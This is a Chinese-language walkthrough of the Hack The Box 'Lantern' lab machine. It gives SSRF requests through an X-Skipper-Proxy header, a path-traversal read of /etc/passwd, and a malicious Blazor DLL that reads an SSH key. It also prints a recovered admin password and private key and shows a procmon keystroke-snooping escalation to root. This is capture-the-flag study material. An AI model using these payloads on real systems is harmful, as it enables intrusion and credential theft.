HacktheBox-Lantern

信息搜集

start infoscan
10.10.11.29:22 open
10.10.11.29:80 open
10.10.11.29:3000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://10.10.11.29:3000   code:200 len:2832   title:None
[*] WebTitle http://10.10.11.29        code:302 len:225    title:Redirecting... 跳转url: http://lantern.htb/

加下 hosts
whatweb 看下指纹，这里发现有 Skipper Proxy。

whatweb http://lantern.htb -v 

80 /vacancies路由下可以上传 pdf 文件。但是似乎这个并不可以。
3000 是一个后台。

观察后台时候能发现 3000 端有个路由建立 websocket：/_blazor
而且能注意到 3000 端后台中有 js 源代码引用位置：

SSRF .Net

X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)

80 端可以打 SSRF

GET /_framework/blazor.boot.json HTTP/1.1

Host: lantern.htb

X-Skipper-Proxy: http://127.0.0.1:5000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: close

Upgrade-Insecure-Requests: 1

{
  "cacheBootResources": true,
  "config": [ ],
  "debugBuild": true,
  "entryAssembly": "InternaLantern",
  "icuDataMode": 0,
  "linkerEnabled": false,
  "resources": {
    "assembly": {
      ...
    },
    "extensions": null,
    "lazyAssembly": null,
    "libraryInitializers": null,
    "pdb": {
      "InternaLantern.pdb": "sha256-E8WICkNg65vorw8OEDOe6K9nJxL0QSt1S4SZoX5rTOY="
    "runtime": {
      "dotnet.timezones.blat": "sha256-KsGUR9nqtXb3Hy6IrNlnc1HoSS+AFlsXTX9rq4oChtA=",
      "icudt.dat": "sha256-Zuq0dWAsBm6\/2lSOsz7+H9PvFaRn61KIXHMMwXDfvyE=",
      "icudt_CJK.dat": "sha256-WPyI4hWDPnOw62Nr27FkzGjdbucZnQD+Ph+GOPhAedw=",
      "icudt_EFIGS.dat": "sha256-4RwaPx87Z4dvn77ie\/ro3\/QzyS+\/gGmO3Y\/0CSAXw4k=",
      "icudt_no_CJK.dat": "sha256-OxylFgLJlFqixsj+nLxYVsv5iZLvfIKMpLf9hrWaChA=",
      "dotnet.wasm": "sha256-JlqjjT2GZWeJko9+pitVfjjmJeEbi4AibzTQr5zTISo=",
      "dotnet..lzvsyl6wav.js": "sha256-6AcYHsbEEdBjeNDUUvrQZuRqASd62mZgQgxz4uzTVGU="
    "satelliteResources": null
  }
}

然后下载 InternaLantern.dll（可以先在 bp 发送包，然后再用 bp 的功能到浏览器打开）

GET /_framework/InternaLantern.dll HTTP/1.1
X-Skipper-Proxy: http://127.0.0.1:5000
Host: lantern.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1

然后反编译 dll 文件。

GitHub - dnSpy/dnSpy: .NET debugger and assembly editor
Thank you for downloading dotPeek!

不知道是不是我的问题，这个在 dnsSpy 和 DotPeek 里面反编译的结果不太一样，在 DotPeek 中能找到若干 base64 加密内容。在InternaLanding.Pages/Internal中可以看到相关内容。

然后将获取到的 base64 解密：

System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22. Ask to change after first login!

admin:AJbFA_Q@925p9ap#22
BTW， 这里有个路径穿越：

/PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd

然后这里可以文件上传：

配置 .Net 环境

sudo apt install dotnet-sdk-6.0
dotnet new console -c test
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0

然后编辑 Program.cs

using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;

namespace test
{
    public class Component : ComponentBase
                    {
        protected override void BuildRenderTree(RenderTreeBuilder builder)
        {
            base.BuildRenderTree(builder);

            // Read file content
            string file = File.ReadAllText("/home/tomas/.ssh/id_rsa"); //ssh key
            builder.AddContent(0, file);
        }
    }
}

dotnet build test.csproj -c Release

但我这里一直报错…这里提供一个别人编译好的。

HackTheBox/lantern.htb/sedlyfx.dll at main · architmadankar/HackTheBox

上传二进制文件。

安装一个 bp 的插件：Blazor Traffic Processor

[{
   "Target": "BeginInvokeDotNetFromJS",
   "Headers": 0,
   "Arguments": [
      "2",
      "null",
      "NotifyChange",
      2,
      [[{
         "blob": {},
         "size": 5120,
         "name": "sedlyfx.dll",
         "id": 1,
         "lastModified": "2024-08-21T09:12:40.765Z",
         "contentType": "application/x-msdownload"
      }]]
   ],
   "MessageType": 1
}]

修改文件名：../../../../../../opt/components/sedlyf.dll

然后再 Choose modeule 里面搜索sedlyf即可：

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

然后调整权限链接：

chmod 600 id_rsa
ssh -i id_rsa tomas@lantern.htb

PE Root procmon

查看邮件：

tomas@lantern:~$ cat /var/mail/$(whoami)
From hr@lantern.htb Mon Jan 1 12:00:00 2023
Subject: Welcome to Lantern!

Hi Tomas,

Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.

While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.

Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.

Exciting times ahead!

Best.

按照要求尝试查看/root/automation.sh，但是权限不足。

tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User tomas may run the following commands on lantern:
    (ALL : ALL) NOPASSWD: /usr/bin/procmon

查看进程，发现正在运行

tomas@lantern:~$ ps -aux | grep automation
root         838  0.0  0.1   7272  4044 pts/0    Ss+  09:35   0:00 nano /root/automation.sh
tomas       1447  0.0  0.0   6612  2244 pts/1    S+   09:37   0:00 grep --color=auto automation

我们现在有权限的只有/usr/bin/procmon。

nbh

查询下，但是没有。

sudo /usr/bin/procmon -p <Automation PID> -e write

等待 5 分钟，F6 保存输出，F9 退出。
或者用脚本：

#!/bin/bash

OLD_PID=$(ps -ef | grep -i nano | grep -v grep | awk '{print $2}')

while true; do
    NEWPID=$(ps -ef | grep -i nano | grep -v grep | awk '{print $2}')
    
    if [ "$OLD_PID" != "$NEWPID" ] && [[ -n "$NEWPID" ]]; then
        echo "We have a new PID! Old PID: $OLD_PID, New PID: $NEWPID"
        OLD_PID=$NEWPID
        sudo /usr/bin/procmon -p $NEWPID -e write -c nano$NEWPID.out
    fi
    
    sleep 5
done

然后将结果使用 scp 传出。

scp -i id_rsa tomas@lantern.htb:/home/tomas/procmon_2024-08-21_09:46:29.db nano.out

procmon 的保存格式是 SQLite，使用 SQLite3 分析：

sqlite3 nano.out
sqlite> .output out.txt
sqlite> SELECT hex(substr(arguments, 9, resultcode)) FROM ebpf WHERE resultcode > 0 ORDER BY timestamp;

从 ebpf 表中选择特定条件下的行，并对其中的 arguments 列进行处理后以十六进制形式返回结果，同时按照时间戳进行排序。
然后需要将十六进制数据转换为 ASCII，再转换转义内容：

import binascii

# Read the content from out.txt
with open('out.txt', 'r') as file:
    hex_data = file.read().strip().replace('\n', '')

# Convert hex data to binary
binary_data = binascii.unhexlify(hex_data)

# Decode the binary data to a string
try:
    decoded_string = binary_data.decode('utf-8', errors='replace')
except UnicodeDecodeError:
    decoded_string = binary_data.decode('latin1', errors='replace')

print("Decoded Data:\n")
print(decoded_string)

运行结果中能注意到：

echo Q 33EEddddttddww33ppMMBB | s uuddoo . //bbaacckkuupp..sshh

根据规律第一个字符输出后加空格，后面的双写，可以还原得到：

echo Q3Eddtdw3pMB | sudo ./backup.sh

前面这个作为 root 密码登录即可。

Beyond Root

我们看看 root 下都有什么：automation.sh.save

#!/usr/bin/expect -f

spawn nano /root/automation.sh

set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"

while {1} {
    foreach char [split $text ""] {
        send "$char"
        sleep 1
    }

    send "\r"

    sleep 0.5

    for {set i 0} {$i < [string length $text]} {incr i} {
        send "\b \b"  ;
    }

    send "\r"
}

这个就是那个加密脚本。

#!/bin/bash

# Directory to clean up in /opt/components
DIR_COMPONENTS="/opt/components"

# Files to exclude in /opt/components
EXCLUDE_FILES_COMPONENTS=("FileTree.dll" "FileUpload.dll" "HealthCheck.dll" "Logs.dll" "Resumes.dll")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_COMPONENTS=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_COMPONENTS[@]}")
EXCLUDE_PATTERN_COMPONENTS=${EXCLUDE_PATTERN_COMPONENTS:1}  # Remove leading '|'

# Find and delete files not in the exclude list in /opt/components
/usr/bin/find "$DIR_COMPONENTS" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_COMPONENTS" | while read -r file; do
    /bin/rm -f "$file"
done

# Directory to clean up in /var/www/sites/lantern.htb/static/images
DIR_IMAGES="/var/www/sites/lantern.htb/static/images"

# Files to exclude in /var/www/sites/lantern.htb/static/images
EXCLUDE_FILES_IMAGES=("about-1.jpg" "about-2.jpg" "about.jpg" "avatar-1.jpg" "avatar-2.jpg" "avatar.jpg" "bg-bot.jpg" "bg-top.jpg" "blog-1.jpg" "blog-2.jpg" "blog-3.jpg")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_IMAGES=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_IMAGES[@]}")
EXCLUDE_PATTERN_IMAGES=${EXCLUDE_PATTERN_IMAGES:1}  # Remove leading '|'

# Find and delete files not in the exclude list in /var/www/sites/lantern.htb/static/images
/usr/bin/find "$DIR_IMAGES" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_IMAGES" | while read -r file; do
    /bin/rm -f "$file"
done

/usr/sbin/service blazor-server restart

清理脚本，定时清理掉上传的内容。

后记

这个确实有点迷糊，.Net这些都是直接用的编译好的 exp。然后这个 procmon 也是第一次见。

参考

[HTB] Lantern
HackTheBox/lantern.htb/README.md at main · architmadankar/HackTheBox